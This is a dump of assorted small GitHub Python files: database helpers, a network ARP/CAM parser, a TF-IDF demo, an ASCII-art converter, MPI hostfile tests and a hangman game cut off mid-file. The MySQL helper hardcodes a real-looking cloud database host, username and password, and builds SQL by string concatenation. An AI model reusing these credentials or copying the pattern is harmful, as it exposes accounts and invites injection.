\"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n # 没有返回的 - 执行一条sql语句\n def runSQL_noReturn(self,SQL):\n try:\n self.__c.execute(SQL) # 执行一条sql语句\n self.__conn.commit()\n except:\n if self.__isDebug:\n showStr = \"执行SQL发生错误!\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n # ------------------------------------------------------------------\n\n # 统计数据\n # sql 格式必须是 COUNT \"SELECT COUNT(*) FROM img_index WHERE state=0 ;\"\n def countItems(self,SQL):\n try:\n # self.__c.execute(\"SELECT COUNT(*) FROM img_index WHERE state=0 ;\")\n self.__c.execute(SQL)\n amount = self.__c.fetchone()[0] # 获取统计总是\n return amount\n except:\n if self.__isDebug:\n showStr = \"统计数据发生错误!\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n\n# ------------------------------------------------------------------\n","repo_name":"nie01/pyboo","sub_path":"iDatabase.py","file_name":"iDatabase.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41499965220","text":"#!/usr/bin/python3\n\nfh = open('/home/gcave/Dropbox/cam.txt')\nfarp = open('/home/gcave/Dropbox/arp-ddc.txt')\n\nlst = []\nl4_lst = []\nsort_lst = []\n\ndef build_tup(*a):\n '''\n get Vlan, MAC, interface, IP wildcard\n '''\n return a\n\ndef getKey(item):\n '''\n Change to sort different fields\n vlan=0, mac=1, interface=2, IP=-1 \n '''\n return item[-1]\n\n# Assemble the CAM table\nfor line in fh:\n if not line.startswith('*'):\n continue\n line = line.split()\n\n if not line[3] == 'dynamic':\n continue\n if line[-1].startswith('G'):\n vlan = line[1]\n mac = line[2]\n interface = line[-1]\n switch = build_tup(vlan, mac, interface)\n lst.append(switch)\n\n# Assemble the ARP table \nfor arp_lst in farp:\n if not arp_lst.startswith('Internet'):\n continue\n arp_lst = arp_lst.split()\n if arp_lst[3] == 'Incomplete':\n continue\n else:\n l4 = arp_lst[1]\n arp_mac = arp_lst[-3]\n arp = build_tup(l4, arp_mac)\n l4_lst.append(arp)\n\n# Verify ARP entry in CAM table\nfor i in lst:\n t0 = i[1]\n for j in l4_lst:\n t1 =(j[-1])\n if t0 in t1:\n vlan = i[0]\n mac_addr = i[1].upper()\n interface = i[2]\n ip_addr = j[0]\n switch = build_tup(vlan, mac_addr, interface, ip_addr)\n sort_lst.append(switch)\n\n#Sort tuples by field\ns = sorted(sort_lst, key=getKey)\n\n# Print sorted list\nfor i in s:\n vlan = i[0]\n mac_addr = i[1]\n interface = i[2]\n ip_addr = i[-1]\n print('IP:%s \\tMAC:%s \\tInterface:%s \\tVlan%s'%(ip_addr, mac_addr, interface, vlan))\n # print('IP:' + ip_addr, '\\tMAC:' + mac_addr, \"\\tInterface:\" + interface, '\\tVlan'+ vlan)\n\n\n\n\n\n \n","repo_name":"gjcave/CISCO-ARP-CAM-PORTMAPPER","sub_path":"mac-parse.py","file_name":"mac-parse.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19260944202","text":"import main\n# https://bytebank.com/cambio?moedaOrigem=Real&quantidade=100&moedaDestino=Dolar\nurl = input(\"Entre com a url desejada: \")\nextrator = main.ExtratorURL(url)\n# extrator2 = main.ExtratorURL(url)\n# print(f'Tamanho da url: {len(extrator)}')\n# print(extrator)\n# print(extrator == extrator2)\nparam = input(\"Entre com o parametro que deseja o valor: \")\nvalor_quant = extrator.get_parametro(param)\nprint(valor_quant)\n","repo_name":"LucasCesarFerreira/Python","sub_path":"extratorURL/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15646100836","text":"import numpy as np\r\nimport math\r\n\r\nfrom PIL import Image\r\n\r\ngscale1 = \"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \"\r\n\r\ngscale2 = '@%#*+=-:. '\r\n\r\n#Average_light hjälpfunktion till Asciiconvert. Tar in en del av bild-filen med en brickas dimensioner som input. Output är ett genomsnitt av ljushet i en bricka. \r\ndef Average_light(image):\r\n\r\n\tim = np.array(image)\r\n \r\n\tw,h = im.shape\r\n \r\n\treturn np.average(im.reshape(w*h))\r\n\r\n\r\n#Asciiconvert funktionens Input: Bild-filen som skall konverteras, antal columner till ascii bilden, skalan ascii-bilden skall printas i, en boolean som bestämmer ascii-tecken paketet.\r\n#Asciiconvert funktionen bestämmer ascii-tecken för varje beräknad bricka i bilden och lägger till dem i en sträng för varje rad som läggs in i listan aimg. I loopen skickas en del av bilden med måtten av den beräknade brickan till hjälpfunktionen Average_light och får tillbaka ett värde på dess genomsnittliga ljushet. Värdet används för att välja korrekt tecken. \r\n#Asciiconvert funktionen output: Listan aimg som består av en sträng ascii-tecken per rad. \r\ndef Asciiconvert(imgFile, columns, scale, moreLevels):\r\n \r\n\tglobal gscale1, gscale2\r\n\r\n\timage = Image.open(imgFile).convert('L')\r\n\r\n\tW, H = image.size[0], image.size[1]\r\n\tprint(\"input image dims: %d x %d\" % (W, H))\r\n\r\n\tw = W/columns\r\n \r\n\th = w/scale\r\n \r\n\trows = int(H/h)\r\n\t\r\n\tprint(\"columns: %d, rows: %d\" % (columns, rows))\r\n\tprint(\"tile dims: %d x %d\" % (w, h))\r\n\r\n\tif columns > W or rows > H:\r\n\t\tprint(\"Image too small for specified columns!\")\r\n\t\texit(0)\r\n\r\n\taimg = []\r\n\r\n\tfor j in range(rows):\r\n\t\ty1 = int(j*h)\r\n\t\ty2 = int((j+1)*h)\r\n\t\tif j == rows-1:\r\n\t\t\ty2 = H\r\n\r\n\t\taimg.append(\"\")\r\n \r\n\t\tfor i in range(columns):\r\n\r\n\t\t\tx1 = int(i*w)\r\n\t\t\tx2 = int((i+1)*w)\r\n\r\n\t\t\tif i == columns-1:\r\n\t\t\t\tx2 = W\r\n\r\n\t\t\timg = image.crop((x1, y1, x2, y2))\r\n \r\n\t\t\tavg = int(Average_light(img))\r\n\t\t\tif moreLevels:\r\n\t\t\t\tgsval = gscale1[int((avg*69)/255)]\r\n\t\t\telse:\r\n\t\t\t\tgsval = gscale2[int((avg*9)/255)]\r\n\r\n\t\t\taimg[j] += gsval\r\n\t\t\t\r\n\t\r\n\treturn aimg\r\n\r\n#main funktionen är den interaktiva delen av programmet. Den tar input från användaren i form av bild-fil, skala, antal columner och en boolean för vilket tecken-packet som används. Main funktionen kallar även på Asciiconvert funktionen, öppnar output-filen och skriver ut aimg-listan rad för rad. \r\ndef main(): \r\n\timgFile = input(\"Paste IMG file here: \\n\")\r\n \t\t\t\r\n\tscale = input(\"Input scale in decimals or press Enter for standard settings: \\n\")\r\n\tif scale == '':\r\n\t\tscale = 0.43\r\n\telse:\r\n\t\tscale = float(scale)\r\n\t\r\n\t\r\n\t\r\n\toutFile = input(\"Input wanted output file or press ENTER for standard settings: \\n\")\r\n\tif outFile == '':\r\n\t\toutFile = 'out.txt'\r\n\t\r\n\tcolumns = input(\"Input number of columns or press ENTER for standard settings: \\n\")\r\n\tif columns == '':\r\n\t\tcolumns = 100\r\n\telse:\r\n\t\tcolumns = int(columns)\r\n \r\n\tmoreLevels = input(\"Input HIGH for more levels of gray scale or press ENTER for standard grayscale \\n\")\r\n\tif moreLevels == '':\r\n\t\tmoreLevels = False\r\n\telif moreLevels == 'HIGH':\r\n\t\tmoreLevels = True\r\n\telif moreLevels == 'high':\r\n\t\tmoreLevels = True\r\n\telse:\r\n\t\tprint(\"Input incorrect. Follow the instructions or the program will not funktion properly \\n\")\r\n\t\texit(0)\r\n\r\n\tprint('generating ASCII art...')\r\n\t\r\n\taimg = Asciiconvert(imgFile, columns, scale, moreLevels)\r\n\r\n\tf = open(outFile, 'w')\r\n\r\n\tfor row in aimg:\r\n\t\tf.write(row + '\\n')\r\n\r\n\tf.close()\r\n\tprint(\"ASCII art written to %s\" % outFile)\r\n\r\n#kallar på main funktionen\r\nmain()\r\n","repo_name":"EmilCrogard/Ascii_art","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9148053445","text":"def fib(n):\r\n assert n >= 0\r\n\r\n f = [0, 1] + [None] * (n - 1)\r\n\r\n for i in range(2, n + 1):\r\n f[i] = f[i - 1] + f[i - 2]\r\n\r\n return f[n]\r\n\r\n\r\nN, M = map(int, input().split())\r\nA = [int(input()) for _ in range(M)]\r\n\r\nA = [-1] + A + [N + 1]\r\nB = []\r\nfor a1, a2 in zip(A[:-1], A[1:]):\r\n n = a2 - a1 - 2\r\n if n >= 0:\r\n B.append(n)\r\n else:\r\n print(0)\r\n break\r\nelse:\r\n ans = 1\r\n for b in B:\r\n ans *= fib(b + 1)\r\n ans %= 10 ** 9 + 7\r\n print(ans)\r\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc129/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39384097137","text":"from kite_text_source import kite_text, kite_history\nfrom nltk.tokenize import TreebankWordTokenizer\nfrom collections import Counter\nfrom collections import OrderedDict\nimport copy\n\ntokenizer = TreebankWordTokenizer()\n\nkite_intro = kite_text.lower()\nintro_tokens = tokenizer.tokenize(kite_intro)\n\nkite_history = kite_history.lower()\nhistory_tokens = tokenizer.tokenize(kite_history)\n\nintro_total = len(intro_tokens)\nhistory_total = len(history_tokens)\nprint('intro total:', intro_total)\nprint('history total:', history_total)\n\nintro_tf = {}\nhistory_tf = {}\n\nintro_counts = Counter(intro_tokens)\nintro_tf['kite'] = intro_counts['kite'] / intro_total\n\nhistory_counts = Counter(history_tokens)\nhistory_tf['kite'] = history_counts['kite'] / history_total\n\nprint(\"Term Frequency of 'kite' in intro is: {:.4f}\".format(intro_tf['kite']))\nprint(\"Term Frequency of 'kite' in history is: {:.4f}\".format(history_tf['kite']))\n\n# compare it with word 'and'\nintro_tf['and'] = intro_counts['and'] / intro_total\nhistory_tf['and'] = history_counts['and'] / history_total\nprint(\"\\nCompare it with word 'and':\")\nprint(\"Term Frequency of 'and' in intro is: {:.4f}\".format(intro_tf['and']))\nprint(\"Term Frequency of 'and' in history is: {:.4f}\".format(history_tf['and']))\n\nnum_docs_containing_and = 0\nnum_docs_containing_kite = 0\nnum_docs_containing_china = 0\nfor doc in [intro_tokens, history_tokens]:\n if 'and' in doc:\n num_docs_containing_and += 1\n if 'kite' in doc:\n num_docs_containing_kite += 1\n if 'china' in doc:\n num_docs_containing_china += 1\n\nintro_tf['china'] = intro_counts['china'] / intro_total\nhistory_tf['china'] = history_counts['china'] / history_total\n\nnum_docs = 2\nintro_idf = {}\nhistory_idf = {}\n\nintro_idf['and'] = num_docs / num_docs_containing_and\nhistory_idf['and'] = num_docs / num_docs_containing_and\n\nintro_idf['kite'] = num_docs / num_docs_containing_kite\nhistory_idf['kite'] = num_docs / num_docs_containing_kite\n\nintro_idf['china'] = num_docs / num_docs_containing_china\nhistory_idf['china'] = num_docs / num_docs_containing_china\n\nintro_tfidf = {}\nintro_tfidf['and'] = intro_tf['and'] * intro_idf['and']\nintro_tfidf['kite'] = intro_tf['kite'] * intro_idf['kite']\nintro_tfidf['china'] = intro_tf['china'] * intro_idf['china']\n\nhistory_tfidf = {}\nhistory_tfidf['and'] = history_tf['and'] * history_idf['and']\nhistory_tfidf['kite'] = history_tf['kite'] * history_idf['kite']\nhistory_tfidf['china'] = history_tf['china'] * history_idf['china']\n\n# t - term, d - document, D - corpus\n# tf(t, d) = count(t) / count(d)\n# idf(t, D) = log (number of documents / number of documents containing t)\n# tfidf(t, d, D) = tf(t, d) * idf(t, D)\n#\n# log_tf = log(term_occurrences_in_doc) - log(num_terms_in_doc)\n# log_log_idf = log(log(total_num_docs) - log(num_docs_containing_term))\n# log_tf_idf = log_tf + log_idf\n\nprint('\\n\\n\\n>>> RELEVANCE RANKING')\ndocs = [kite_intro, kite_history]\n\ndoc_tokens = []\nfor doc in docs:\n doc_tokens += [sorted(tokenizer.tokenize(doc.lower()))]\nprint(\"Len doc_tokens[0]:\", len(doc_tokens[0]))\n\nall_doc_tokens = sum(doc_tokens, [])\nprint(\"Len all_doc_tokens:\", len(all_doc_tokens))\n\nlexicon = sorted((set(all_doc_tokens)))\nprint(\"Len lexicon:\", len(lexicon))\nprint(lexicon)\n\nzero_vector = OrderedDict((token, 0) for token in lexicon)\n\ndocument_tfidf_vectors = []\nfor doc in docs:\n vec = copy.copy(zero_vector)\n tokens = tokenizer.tokenize(doc.lower())\n token_counts = Counter(tokens)\n\n for key, value in token_counts.items():\n docs_containing_key = 0\n for _doc in docs:\n if key in _doc:\n docs_containing_key += 1\n tf = value / len(lexicon)\n if docs_containing_key:\n idf = len(docs) / docs_containing_key\n else:\n idf = 0\n vec[key] = tf * idf\n document_tfidf_vectors.append(vec)\n\n# print(document_tfidf_vectors)\nprint('cosine similarity')\n\nfrom e2_compute_cosine_similarity import cosine_sim\n\nprint('len documents_tfidf_vectors:', len(document_tfidf_vectors))\nprint(cosine_sim(document_tfidf_vectors[0], document_tfidf_vectors[1]))\n\n","repo_name":"VolDonets/natural_language_processing","sub_path":"part_2/e4_topik_modeling.py","file_name":"e4_topik_modeling.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42903077197","text":"import numpy as np\nimport pandas as pd\nimport sklearn as sk\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error , precision_score,accuracy_score,f1_score,recall_score\n\ndf = pd.read_csv(\"heart.csv\")\n\n\nX = df.drop(['target'],axis =1)\ny = df['target']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y,stratify = y)\n\nmodel = DecisionTreeClassifier()\nmodel.fit(X_train,y_train)\npred = model.predict(X_test) \n\nscores = cross_val_score(DecisionTreeClassifier(),X,y,cv= 5)\nprint(\"The score of cross_validiation_score :\")\nprint(\" %.3f \" % scores.mean())\n\nprint(\"Precision : \",end=\" \")\nprint(\" %.3f \" % precision_score(y_test,pred))\n\nprint(\"Accuracy :\",end=\" \")\nprint(\" %.3f \" % accuracy_score(y_test,pred))\n\nprint(\"recall score :\",end=\" \")\nprint(\" %.3f \" % recall_score(y_test,pred))\n\nprint(\"f1_score :\",end=\" \")\nprint(\" %.3f \" % f1_score(y_test,pred))\n\n","repo_name":"sunny567s35/Bagging_Fuzzy_GBDT_Algorithm","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17411695694","text":"class Solution:\n # @param A : tuple of integers\n # @param B : tuple of integers\n # @return a list of integers\n def intersect(self, A, B):\n ans = []\n A_pointer = 0\n B_pointer = 0\n while A_pointer < len(A) and B_pointer < len(B):\n if A[A_pointer] == B[B_pointer]:\n ans.append(A[A_pointer])\n A_pointer += 1\n B_pointer += 1\n\n elif A[A_pointer] < B[B_pointer]:\n A_pointer += 1\n\n else:\n B_pointer += 1\n\n return ans\n\n\nif __name__ == '__main__':\n A= [1, 2, 3, 3, 4, 5, 6]\n B= [3, 3, 5]\n print(Solution().intersect(A, B))","repo_name":"avirupdandapat/ALGOPROJECT","sub_path":"intersectofsortarr.py","file_name":"intersectofsortarr.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72107155308","text":"import os\n\nfrom utils.env_config import load_yaml_env_config\nfrom utils.constants import DEFAULT_ENV_CONFIG_FILEPATH, LIST_ENV_VARS\n\n\ndef initialize_env() -> None:\n \"\"\"\n Initialize the environment variables for HuggingFace and WandB.\n \n By default, the environment variables are loaded from the file `configs/env_config.yaml`.\n One can also specify the path to the config file using the environment variable `ENV_CONFIG_FILEPATH`.\n \"\"\"\n env_config_filepath = os.environ.get(\"ENV_CONFIG_FILEPATH\", DEFAULT_ENV_CONFIG_FILEPATH)\n env_config = load_yaml_env_config(env_config_filepath)\n \n for var in LIST_ENV_VARS:\n if getattr(env_config, var) is not None:\n os.environ[var] = getattr(env_config, var)\n \n return\n\n\ndef print_envs() -> None:\n for env in LIST_ENV_VARS:\n print(f\"{env}: {os.environ.get(env, None)}\")\n return\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"utils/initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34444697620","text":"import gensim\nimport numpy as np\nimport spacy\nfrom spacy import displacy\nfrom gensim.corpora import Dictionary\nfrom gensim.models import LdaModel\nimport matplotlib.pyplot as plt\nimport sklearn\n# import keras\n# file =input()\nfile=input()\nfile_handle=open(file,'r')\nfile_handle.readline()\nprint(\"issue_id~stam_let\")\nnlp = spacy.load('en_core_web_sm')\n\nfor line in file_handle:\n a,text=line.split(\"~\",1)\n text=text[:-1]\n text=' '.join(text.split('\\n'))\n text=' '.join(text.split())\n text=text+\"\\n\"\n # print(text)\n\n doc = nlp(text.lower())\n # print(doc)\n # sent = nlp(u\"Tom ran to the repair shop to fix his bicycle.\")\n\n\n # for token in sent:\n # print(token.text, token.pos_, token.tag_)\n\n\n # we add some words to the stop word list\n texts, article = [], []\n for w in doc:\n # if it's not a stop word or punctuation mark, add it to our article!\n if w.text != '\\n' and not w.is_stop and not w.is_punct and not w.like_num and w.text != 'I':\n # we add the lematized version of the word\n article.append(w.lemma_)\n # if it's a new line, it means we're onto our next document\n if w.text == '\\n':\n texts.append(article)\n article = []\n print(a,end=\"~\")\n for i in texts:\n for j in i:\n print(j,end=\" \")\n print()\n","repo_name":"atreytushar11/Research_SOE-1","sub_path":"Topic/stam_let.py","file_name":"stam_let.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42759135228","text":"# read numbers from inputs.txt and count the number of times they increase\ndef main():\n with open('inputs/inputs5.txt') as f:\n # read file without newline characters\n data = f.read().splitlines()\n # every line is of form x1,y1 -> x2,y2 read it into numbers\n numbers = []\n for line in data:\n numbers.append(list(map(lambda x: tuple(map(int, x.split(','))), line.split(' -> '))))\n print(f'Part 1: {part1(numbers)}')\n # print(f'Part 2: {part2(tables, numbers)}') \n\n\ndef part1(lines):\n board = bounds(lines)\n for line in lines:\n x, y = line\n x1, y1 = x\n x2, y2 = y\n board[y2][x2] += 1\n while x1 != x2 or y1 != y2:\n board[y1][x1] += 1\n x1 += 1 if x2 > x1 else 0 if x1 == x2 else -1\n y1 += 1 if y2 > y1 else 0 if y1 == y2 else -1 \n c = sum([1 for x in board for y in x if y > 1])\n return c\n\n \n# find the bounds of the 2d array of lines given coordinates\ndef bounds(lines):\n xmax = max([max(x[0][0], x[1][0]) for x in lines])\n ymax = max([max(x[0][1], x[1][1]) for x in lines])\n # make 2d array of zeros with bounds\n board = [[0 for x in range(xmax+1)] for y in range(ymax+1)]\n # print(xmax, ymax)\n return board\n \n# def hlep(line):\n# x, y = line\n# x1, y1 = x\n# x2, y2 = y\n# if x1 == x2:\n# return \"v\"\n# elif y1 == y2:\n# return \"h\"\n# else:\n# return \"d\"\n\n\ndef part2(boards, numbers):\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"aadibajpai/advent","sub_path":"2021/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74652401387","text":"import pymysql\nimport datetime\n\n\nclass DB:\n def __init__(self):\n self.db = None\n self.today = None\n self.init()\n\n def init(self):\n self.today = datetime.datetime.now().date()\n self.connect()\n\n # connect to database\n def connect(self):\n times = 0\n N = 10\n while times < N:\n try:\n self.db = pymysql.connect(\"class568.cgzotjrssahz.us-east-1.rds.amazonaws.com\", \"ryan\", \"11111111\", \"stock\")\n break\n except:\n print('hh')\n times += 1\n\n # insert one row in related table\n def insert(self, tableName, row):\n sql = 'insert into ' + tableName + ' values('\n for item in row:\n sql += repr(item) + ','\n sql = sql[:-1]\n sql += ');'\n print(sql)\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n self.db.rollback()\n\n # delete all data in realtime table\n def delete_realtime(self):\n cur = datetime.datetime.now().date()\n if cur == self.today:\n return None\n sql = 'delete from RealTimePrice;'\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n print('hhh')\n self.db.rollback()\n finally:\n self.today = cur\n\n # delete all data in history table\n def delete_history(self):\n cur = datetime.datetime.now().date()\n if cur == self.today:\n return None\n earliest_date = str(datetime.date(cur.year - 1, cur.month, cur.day))\n sql = 'delete from HistoryPrice where historyTime < {};'.format(earliest_date)\n print(sql)\n try:\n cursor = self.db.cursor()\n cursor.execute(sql)\n self.db.commit()\n cursor.close()\n except:\n print('hhh')\n self.db.rollback()\n finally:\n self.today = cur\n\n def delete(self):\n self.delete_realtime()\n self.delete_history()\n\nif __name__ == '__main__':\n db = DB()\n # table = 'HistoryPrice'\n # row = ['sys-0','2017-10-09','27','89','128','21','1321']\n # db.insert(table,row)\n # table = 'RealTimePrice'\n # row = ['sys-0', '23:12:12', '80','1208']\n # db.insert(table,row)\n db.delete()\n\n","repo_name":"hengshaochen/airline_booking_system","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43285132513","text":"import numpy as np\nfrom keras import backend as K\nfrom keras.losses import mean_absolute_error\n\nfrom losses import ssim, photometric_consistency_loss\n\nx = np.ones((1, 10, 10, 1))\ny = np.ones((1, 10, 10, 1))\n\nx_img1 = K.variable(x)\ny_img1 = K.variable(y)\n\nssim1 = ssim(x_img1, y_img1)\n\nassert K.eval(ssim1).all() == np.zeros((1, 10, 10)).all()\n\nx_img2 = K.variable(255*x)\ny_img2 = K.variable(-255*y)\n\nssim2 = ssim(x_img2, y_img2)\n\nassert K.eval(ssim2).all() == np.ones((1, 10, 10)).all()\n\npcl = photometric_consistency_loss(x_img1, y_img1)\n\nassert K.eval(pcl).all() == np.zeros((1, 10, 10)).all()","repo_name":"maj-personal-repos/UnDeepVO","sub_path":"losses_test.py","file_name":"losses_test.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"} +{"seq_id":"73154599467","text":"from PyQt5.QtWidgets import QGraphicsScene, QGraphicsView, QWidget\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtCore import QSize, QTimer, Qt\n\nfrom gui import GUI\nfrom ending import Ending\n\n\nclass World(QGraphicsScene):\n \"\"\"Here we set up the graphics view and timer for it. We visualize the items that are\n put on the scene in the GUI class and take in the keypressevents.\"\"\"\n\n def __init__(self, menu, levelfile):\n super().__init__()\n self.gui = GUI(self)\n self.menu = menu\n self.levelmap = levelfile\n self.keys = set()\n\n self.x = 0\n self.y = 0\n self.window = None\n\n self.treasure = None\n self.ground_blocks = []\n self.enemies = []\n self.traps = []\n self.fox = None\n\n self.level_view()\n\n self.timer = QTimer(self)\n self.timer.start(10)\n self.timer.timeout.connect(self.window_update)\n\n def level_view(self):\n self.x, self.y = self.gui.create_map(self.levelmap)\n self.window = QGraphicsView(self)\n self.window.setWindowFlags(Qt.FramelessWindowHint)\n self.window.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.window.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.window.setFixedSize(1500, 800)\n self.setSceneRect(0, 0, self.x*100, self.y*100)\n\n self.window.setStyleSheet(''' color: none; background-image: url(./src/graphics/level1_background.png); border: none;''')\n\n self.window.show()\n\n def keyPressEvent(self, e):\n self.keys.add(e.key())\n\n def keyReleaseEvent(self, e):\n self.keys.remove(e.key())\n\n def window_update(self):\n self.update()\n for enemy in self.enemies:\n enemy.update_position()\n self.fox.update_position(self.keys)\n self.window.centerOn(self.fox.pos())\n\n def loss_victory(self, background):\n ending = Ending(self.menu, background)\n position = self.window.mapToScene(350, 0)\n ending.move(position.toPoint())\n self.addWidget(ending, Qt.Widget)","repo_name":"EssiTallgren/fox-burglar","sub_path":"src/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21636574728","text":"from mpi.lib.hostfile.parser import parse_hostfile\nfrom mpi.lib.hostfile.mappers import round_robin, HostfileMapException \n\n__all__ = (\"parse_hostfile\", \"round_robin\" )\n\nimport unittest\n\nclass TestRoundRobin(unittest.TestCase):\n \n def setUp(self):\n # Generate a bunch of fake hostfile data. Just for run\n self.hostfile_info = []\n procs = 40\n for i in range(procs):\n self.hostfile_info.append({'host' : \"myhost%d\" % i, 'cpu' : 2, 'max_cpu' : 4})\n\n def test_invalid_overmapping(self):\n # 4 actual CPUs, each overmapping by 4 = 16 virutal\n self.assertRaises(HostfileMapException, round_robin, self.hostfile_info, 4, 16, 17, False)\n \n def test_more_cpus_than_ranks(self):\n expected_data = [('myhost0', 0), ('myhost1', 1), ('myhost2', 2), ('myhost3', 3)]\n data = round_robin(self.hostfile_info[:4], 8, 16, 4, False)\n self.assertEquals(data, expected_data)\n\n def test_overmapping(self):\n data = round_robin(self.hostfile_info[:2], 4, 8, 8, True)\n expected_data = [('myhost0', 0), ('myhost1', 1), ('myhost0', 2), ('myhost1', 3), ('myhost0', 4), ('myhost1', 5), ('myhost0', 6), ('myhost1', 7)]\n self.assertEquals(data, expected_data)\n\n def test_nodata(self):\n data = round_robin([], 0, 0, 8, True)\n expected_data = [('localhost', 0), ('localhost', 1), ('localhost', 2), ('localhost', 3), ('localhost', 4), ('localhost', 5), ('localhost', 6), ('localhost', 7)]\n self.assertEquals(data, expected_data)\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"jamitzky/pupyMPI","sub_path":"pupympi/mpi/lib/hostfile/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17333650658","text":"# Warning: \n# In the problem, it is said that \"Christy can give 1, 2 or 5 chocolates\".\n# Correct: Christy can give 1, 2 or 5 chocolates. \n# Otherwise you will get \"Wrong Answer\"\n\ndef oper_per_person(n):\n ans =0\n ans += int(n//5)\n n %= 5\n ans += int(n//2)\n n %= 2\n ans += n\n return ans\n\n\ndef total_oper(min, minus, arr, n):\n min_oper = 0\n for i in range(n):\n min_oper += oper_per_person(arr[i] - (min-minus))\n return min_oper\n\n\nif __name__ == '__main__':\n t = int(input())\n for x in range(t):\n n = int(input())\n emp = list(map(int, input().split()))\n\n mn = min(emp)\n ans = total_oper(mn, 0, emp, n)\n\n for i in range(1, 5):\n temp = total_oper(mn, i, emp, n)\n ans = min(ans, temp)\n print(ans)\n\n","repo_name":"MhmdRyhn/ProblemSolving","sub_path":"Hacker Rank/Equal.py","file_name":"Equal.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33893992816","text":"import random\nimport hangman_art\nimport hangman_words\n\n#print the logo of this game\nfrom hangman_art import logo, stages\nprint(logo)\n\n#STEP 1\n# create a word list\n# word_list = hangman_words.word_list\n# choose a random work from the word list\nfrom hangman_words import word_list\nchosen_word = random.choice(word_list)\n\n# print(f'chosen_word is {chosen_word}')\n\n#STEP 2\n# create an empty list the is of same length as the chosen_word\ndisplay = []\nfor letter in chosen_word:\n\tdisplay.append('_')\n\nprint(display)\n\n#set lives equal 6\nlives = 6\ncorrect_guess = False\nguess_list = []\nwhile '_' in display and lives>0:\n\t# let the user guess a letter. Create a list of all the guesses\n\tguess = input('Guess a letter: ').lower()\n\t\n\n\t# check if the guessed letter is in the chosen_word\n\tif guess in chosen_word:\n\t\tif guess in display:\n\t\t\tprint(f'You have already guessed the letter {guess}.')\n\t\t\tprint(stages[lives])\n\t\telse:\n\t\t\tcorrect_guess = True\n\t\t\t# if user guesses a letter that is present in the chosen word then \n\t\t\t# reveal only that letters in the word\n\t\t\tfor num in range(len(chosen_word)):\n\t\t\t\tif 